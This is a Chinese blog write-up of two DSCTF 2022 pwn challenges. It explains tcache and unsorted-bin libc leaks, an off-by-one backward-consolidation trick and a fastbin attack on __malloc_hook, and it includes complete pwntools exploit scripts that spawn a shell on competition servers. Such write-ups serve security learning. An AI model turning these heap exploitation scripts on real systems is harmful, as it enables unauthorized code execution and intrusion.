DSCTF pwn 部分wp

已于 2022-07-18 14:19:57 修改
阅读量801 收藏 1
点赞数 2
CC 4.0 BY-SA版权
分类专栏: wp 文章标签: ubuntu pwn
于 2022-07-15 21:05:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Invin_cible/article/details/125812355
这篇博客详细介绍了如何利用fuzzerinstrospector和rusty两个pwn题目中的堆溢出漏洞,通过泄露libc基址并调用system函数执行/bin/sh来获取shell。作者首先分析了程序的内存分配和释放行为,然后通过精心构造的堆块合并和off-by-one错误,成功泄露了libc基址。最后,通过fastbin attack实现了getshell。博客中还提到了一些在不同glibc版本下的技巧和挑战,以及解决方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DSCTF pwn 部分wp

原谅我懒,不想附图了,客官老爷们多包涵。

拿了第七:

32RK7_6C5A[)O6($F8NH1$C

出了两道pwn:

66J0WNBXM}1U_C7~XZV(MBR

fuzzerinstrospector

Case 6 有带rdi的任意指针调用,只要泄露libc即可。

rdi指向的内容可控。

add函数和edit函数功能相似。add函数malloc指定大小0x108。

前八个字节是自己写进的东西,后面字节是类似于一个字典的东西。通过字典才能打印。

可以先free掉七个堆块进入tcache填满,然后delete堆块进入unsortedbin。

不过申请unsortedbin的时候,他似乎会先检查符合tcache大小,然后放进tcache再分配,这时候会清空fd,就不能达到泄露的目的。

所以我通过合并操作先让他与旁边堆块合并再与top chunk合并,保留下来了fd指针。

然后利用scanf读入失败,就不会给前八字节赋值,把fd保留下来了,然后泄露libc基址。

最后调用system(‘/bin/sh’)即可。

exp:

from secrets import choice
from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/DSCTF/fuzzerinstrospector')
r  =remote('39.105.185.193',30007)
libc = ELF('/mnt/hgfs/ubuntu/DSCTF/libc-2.27.so')

def menu(choice):
    r.recvuntil(b"Your choice: ")
    r.sendline(str(choice))

def add(index,content):
    menu(1)
    r.recvuntil(b"Index: ")
    r.sendline(str(index))
    for i in range(8):
        r.recvuntil(b'Index')
        r.sendline(b'+')
    r.recvuntil(b"Bitmap: ")
    r.send(content)

def delete(index):
    menu(4)
    r.recvuntil(b"Index: ")
    r.sendline(str(index))

def show(index):
    menu(3)
    r.recvuntil(b"Index: ")
    r.sendline(str(index))

def edit(index,content):
    menu(2)
    r.recvuntil(b"Index: ")
    r.sendline(str(index))
    for i in range(8):
        r.recvuntil(b'Index')
        r.sendline(content[i])
    r.recvuntil(b"Bitmap: ")
    r.send(indexindex)

indexindex = b''
for i in range(0x100):
    indexindex += i.to_bytes(1,'little')
add(0,b'a'*0x100)
add(1,b'a'*0x100)
add(2,b'a'*0x100)
add(3,b'a'*0x100)
add(4,b'a'*0x100)
add(5,b'a'*0x100)
add(6,b'a'*0x100)
add(7,b'a'*0x100)
add(8,b'a'*0x100)
[delete(i) for i in range(9)]
[add(j,indexindex) for j in range(7)]
add(7,indexindex)

show(7)
fd = 0
for k in range(6):
    r.recvuntil(b'Bit: ')
    tmp = int(r.recvuntil(b'\n')[:-1],10)
    fd += tmp<<(k*8)

libc_base = fd-0x3ebca0
system_addr = libc_base+libc.sym["system"]
delete(0)
menu(1)
r.sendlineafter(b'Index: ',b'0')
for i in range(8):
    r.sendlineafter(b'Index: ',str(b'/bin/sh\x00'[i]).encode())
r.sendafter(b'Bitmap: ',indexindex)
menu(6)
r.sendline(str(system_addr))
# gdb.attach(r)

log.success("libc_base: "+hex(libc_base))
r.interactive()

rusty

  • 1.add功能:add 0-0x100大小的堆块。并且调用的是calloc。

  • 2.edit功能:可以有off by one。

  • 3.delete功能:删除上一个add的堆块,也就是说delete是从下往上free的。

  • 4.show功能:有utf-8编码。

有了off by one是可以构造chunk overlapping的,不过问题出在这道题调用的是calloc,会清空堆块内内容,并且free的不可控性让这道题难度增大。

思路一:glibc2.27版本下,我的最初想法是看到了程序自带的0x1800大小的堆管理结构,我想泄露堆基址后通过古老版本已知堆基址的unlink改变堆管理结构中的堆指针。这样就可以写入已知的栈地址,进行泄露libc和getshell。不过堆地址在我看来几乎是不可泄露的。原因1:要show的话就必须使当前堆块没有被free掉,当前堆块没有被free掉的话,能show出堆地址就只有一种可能性了:通过unsortedbin分割一个堆块,然后show这个堆块里的内容。不过可惜,这道题用的是calloc,会清空堆块内容,所以泄露堆基址这一思路我放弃了。

思路二:由于这道题的delete是从下往上free,所以off by one基本上没有什么用。因为off by one构造chunk overlapping基本都是往下构造的。我想到用off by one转换成off by null向上合并。在glibc2.27版本下是没有对size和prev_size的检测的。那么我们可以采用夹心饼攻击。通过两个unsortedbin中间夹tcache bin来泄露libc基址。同时由于calloc不分配tcache,所以我在中间也夹了fastbin。最终用fastbin attack getshell。

问题来了,我们off by null合并堆块得delete下方堆块触发合并,那么就得先在上方构造一个unsortedbin,再free掉下方堆块触发合并。

但是delete是由下往上的free,如何在不free掉下方堆块的情况下,使得上方堆块出现一个unsortedbin呢?

我这里采用的方法是先将0x80与0x100大小的tcache空闲列表填满,然后free掉两个0x100大小的堆块合并成一个0x200大小的unsortedbin,然后将其切割成0x90大小的unsortedbin。

这样上方就会有一个0x90大小的unsortedbin(带fd,bk)。

然后再在下方calloc(0xf8)堆块,free掉若干的0xf8大小的堆块后。然后通过off by one edit最顶上的0xf8大小的堆块,向第二个0xf8大小的堆块写入fake_prev_size和\x00字节,最后free掉第二个0xf8大小的堆块触发向上合并。

这时候再切割大unsortedbin到未被free掉的0x100大小的堆块,然后用show功能show出libc基址。

这里出题人show出的是utf-8编码后的字符。

我python3可以直接解码,但是python2会出一点问题,得分段获取。

然后就是fastbin attack。打malloc_hook填入ogg。

不过我本地早就通了远程通不了。

由于我的堆风水过于复杂,被迫换ubuntu18调试,换了ubuntu18之后libc小版本一致,这解决了第一个堆风水的问题,那就是原有程序free掉了一个0x100堆块,导致我多填充了一个。

解决掉这个问题之后我的远程还是通不了,最后尝试在malloc_hook附近爆破0x7f字节的地址成功了。

exp:

from pickle import TRUE
from pwn import *
from time import sleep
# context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# r = process('/home/cru5h/bin/2022/11/rusty')
# r = remote('39.105.187.159',30008)
libc = ELF('/home/cru5h/bin/2022/11/libc-2.27.so')

def menu(choice):
    r.recvuntil(b'Command:')
    r.sendline(str(choice))

def add(size):
    menu(1)
    r.recvuntil(b'Size: ')
    r.sendline(str(size))

def edit(index,size,content):
    menu(2)
    r.recvuntil(b'Idx: ')
    r.sendline(str(index))
    r.recvuntil(b'Len: ')
    r.sendline(str(size))
    r.recvuntil(b'Data: ')
    r.sendline(content)

def delete():
    menu(3)

def show(index):
    menu(4)
    r.recvuntil(b'Idx: ')
    r.sendline(str(index))


def pwn(i):
    r.recvuntil(b'Let\'s build a rusty house!\n')
    stack_addr = int(r.recvuntil(b'\n')[:-1],16)


    [add(0x88) for i in range(8)] #0-7
    [add(0x100) for i in range(9)]#8-16
    [add(0x68) for k in range(8)]#17-24
    [delete() for j in range(17)]
    add(0x80)#8
    add(0x100)#9

    [add(0xf8) for k in range(9)]#10-18
    [delete() for l in range(7)]
    edit(10,0xf9,b'a'*0xf0+p64(0xc70)+b'\x00')#9-11 exists

    delete()
    add(0x70)#11
    [add(0x100) for o in range(6)]#12-17
    add(0xf0)#18
    [add(0x60*2) for o in range(4)]#19-22
    add(0x40)#23
    

    show(10)





    r.recvuntil(b'Data: ')
    # something= r.recvuntil(b'\x7f')[-6:].decode('utf8')
    # print(something)
    r.recv(2)
    # res = r.recvuntil(b'\x7f')
    # print(res)
    # print(len(res))
    # libc_base = u64(res.ljust(8,'\x00')) - 0x3ebca0

    libc_base = u64(r.recvuntil(b'\x7f').decode('utf8').ljust(8,'\x00'))
    libc_base = (libc_base<<8)+0xa0-0x3ebca0
    print(hex(libc_base))
    one_gadget = libc_base+0x4f302
    malloc_hook = libc_base+libc.sym["__malloc_hook"]
    print(hex(malloc_hook))
    # edit(19,0x40,p64(0)+p64(0x71)+p64(malloc_hook-0xb-0x8))
    
    edit(19,0x40,p64(0)+p64(0x71)+p64(malloc_hook-0xb-0x8 - 0x48 +i))
    # gdb.attach(r)
    add(0x60)#24
    add(0x68)#25
    edit(25,0x20+0x48-i,b'g'*(0xb-8 +0x48-i)+p64(one_gadget))
    # pause()
    
    # log.success("libc_base: "+hex(libc_base))
    # gdb.attach(r)
    menu(1)
    r.interactive()


for i in range(0x60):
    r = remote('39.105.187.159',30008)
    try:
        print(i)
        pwn(i)
        
    except EOFError:
        r.close()
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 766
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
ctfshow pwn wp
Chandra的学习之路
11-26 1039
mov eax,[esi]:将esi中的值作为地址(080490E8地址单元中的值,eax只能读取4个字节的内容,读取一个字符Ascii码即1个字节),然后将该地址单元的值赋给eax,我们在ida可以查看080490E8地址单元的值(Welc倒序的ascii码)。根据题目要求,直接查看寄存器寻址方式的内容,可以得到edx的值为0x36d,根据之前某题大写提示,改成0x36D,即:ctfshow{0x36D}mov esi,msg:将msg的地址赋给esi,此时esi寄存器中的值为080490E8;
DSCTF2022 fuzzerinstrospector-Wp
m0_46329041的博客
07-17 338
由于这题的libc版本是2.27的,存在tcache,题目限制了最多申请9个chunk,所以,申请9个并释放,填满tcache后,剩下的chunk由于大于fastbin的size,会进入unsortedbin,这样就可以通过该chunk的fd指针泄露出main_arena,从而计算得到libc,然后再计算出system的地址,并向chunk写入。BitMap是一种算法,在数据量特别大时,可以很好的缩减时间复杂度,通过在对应位置填上对应的值,来表明该位置代表的数字,是否存在。,并调用6号选项即可。......
CG-CTF pwn部分wp
awxnutpgs545144602的博客
08-16 447
面向pwn刷cgctfPWN1,When did you born题目给了一个ELF文件,和一个.C文件先运行ELF,大概如下What’s Your Birth?0What’s Your Name?0You Are Born In 0You Are Naive.You Speed One Second Here.打开.C文件,发现是ELF的源码 #include ...
2022 DSCTF决赛wp
qq_45603443的博客
08-04 1034
2022 DSCTF决赛wp
d^3CTF web部分wp
fmyyy1的博客
03-07 1203
d3oj 提示是尝试用oct用户登陆,翻组件版本看到个合适的 https://hackerone.com/reports/869574 编辑文章哪里很明显 POST /article/0/edit HTTP/1.1 Host: xxx User-Agent: xx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1673
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
强网杯2021 pwn部分wp
eeeeeight的博客
06-18 1421
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加…直到变成一个byte的数字, 然后加到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
2020SCTF PWN部分wp
starssgo的博客
07-06 1104
人在楼顶,感觉良好。 目前的自己还是只能做一些常规的Liunx下的PWN题,对其他的我就是个废物了。 这里写目录CoolCodesnake总结 CoolCode 这个题主要是shellcode非常的难构造。 比赛的时候whali3n51大师傅做出来的,我只是复现了他的payload。 本题目沙盒只剩下了0,1,5,9四个函数调用。 当我们想构造ORW的时候,没有open函数怎么办。 这个时候我们知道5在32位下是open。 那么我们考虑用retfq修改cs寄存器从而修改运行模式。 具体参考:https:/
CTFSHOW 36D杯CTF(pwn部分wp
weixin_44296844的博客
05-04 2053
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
BUUCTF pwn wp 16 - 20
fa1c4的blog
08-24 584
[HarekazeCTF2019]baby_rop int __cdecl main(int argc, const char **argv, const char **envp) { char v4[16]; // [rsp+0h] [rbp-10h] BYREF system("echo -n \"What's your name? \""); __isoc99_scanf("%s", v4); printf("Welcome to the Pwn World, %s!\n", v4
NKCTF pwn方向wp
maple105890的博客
03-27 587
然后放堆快指针的附近有malloc_context+0x18的地址,里面有很多dirty_data,而且got表可写,泄露出来打free函数。然后发现二次输入能直接把rbp末尾覆盖成\x00,那就在栈中构造rop链就好了。所以考虑和ez_stack一样的做法,比爆破ogg快多了。虽然给了libc,但构造了⼀下shellcode也能出。存在格式化字符串漏洞,先把cananry泄露出来。给了libc,可以光明正大偷鸡了bushi。直接rand搞一下就出了,连爆破都不用。和西湖那题有一点像,但那题还要抬栈。
TAMU ctf pwn部分wp+赛后
z1r0的博客
04-19 2491
TAMU ctf pwn部分wp 国外的题目,终端连不上就很gan ga。。。。。。 Tr*vial 大水题,栈溢出,ret2text exp from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1b[01
2021祥云杯 CTF pwnwp
qq_39948058的博客
08-26 1306
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
(XGCTF)西瓜杯pwn部分wp
susu_xiaosu的博客
07-23 832
【代码】(XGCTF)西瓜杯pwn部分wp
CTF(PWN基础笔记)
WuXianYo_的博客
03-17 318
8)完成计算后,执行pop ebp,因被调函数(子函数)不存在局部变量,所以在最后esp与ebp在同一个指向上,不需要leave指令移动esp到ebp(若存在局部变量,则esp与ebp不在同一点,因为需要留出栈空间存放变量),pop ebp将esp指向的父函数的原先的ebp值存入ebp中,所以ebp会回到原先指向的位置,esp再自动抬高一个字长,最后执行return指令,将下方的esp再抬高一个字长,并将esp原来指向的值存入esp中。6)执行mov,将esp的值赋给sbp,把ebp抬到新的栈底.
2021 Picoctf pwn部分wp
weixin_46521144的博客
07-18 647
首先说一下,是参考了校内学长的复盘讲解hhh,这也是第一次直接接触在线的ctf而不是靶场。 Gauntlet1 在ida里面看一下。这三道Gauntlet都是一个类型的,漏洞都是一个格式化字符串+栈溢出。 那就很容易直接把shellcraft.sh()写道栈上,因为一开始给打印了背写区域的起始位置并且使可执行的栈,一溢出就会跳转到我们写的shellcraft上面执行。注意中间还要有个格式化字符串的额send,不要忘了,之前卡在这里好久啊。。。 exp from pwn import * context.
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 762
buuctf pwn
ISCTF PWN WP 2022
GeekCmore的博客
11-07 1567
ISCTF PWN 部分题解 WP
pwn羊城杯2024wp
最新发布
02-19
### 关于羊城杯2024 PWN比赛Writeup 针对2024年“羊城杯”粤港澳大湾区网络安全大赛PWN部分的比赛写真,可以参考Ns100kUp发布的详细分析[^1]。该文档不仅涵盖了比赛的整体情况,还特别提到了一些关键技术细节。 #### xpstack技术解析 在比赛中提到的一个重要概念是`xpstack`,这是一种用于处理特定漏洞利用的技术框架。通过这种技术,选手能够更高效地构建攻击载荷并绕过某些防护机制。 #### hardsandbox挑战分析 对于hardsandbox这一题目,存在一个问题即使用`openat2`函数仅能在本地环境中成功执行而无法应用于远程场景[^2]。这主要是因为`openat2`涉及到的操作权限以及网络环境下的文件描述符传递问题,在实际应用中需要额外考虑这些因素的影响。 以下是将USB数据转换成坐标的Python脚本示例,此代码片段来源于往届比赛中的一个实例[^3]: ```python nums = [] with open(&#39;usbdata.txt&#39;, &#39;r&#39;) as keys, open(&#39;xy.txt&#39;, &#39;w&#39;) as f: posx = 0 posy = 0 for line in keys: if len(line.strip()) != 12: continue x = int(line[3:5], 16) y = int(line[6:8], 16) if x > 127: x -= 256 if y > 127: y -= 256 posx += x posy += y btn_flag = int(line[0:2], 16) # 解析按钮标志位 if btn_flag != 0: # 如果检测到鼠标按键被按下,则记录当前位置 f.write(f"{posx} {posy}\n") ``` 此外,还有一个名为`Re BBBButton`的flag字符串提供了进一步的研究方向[^4]。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值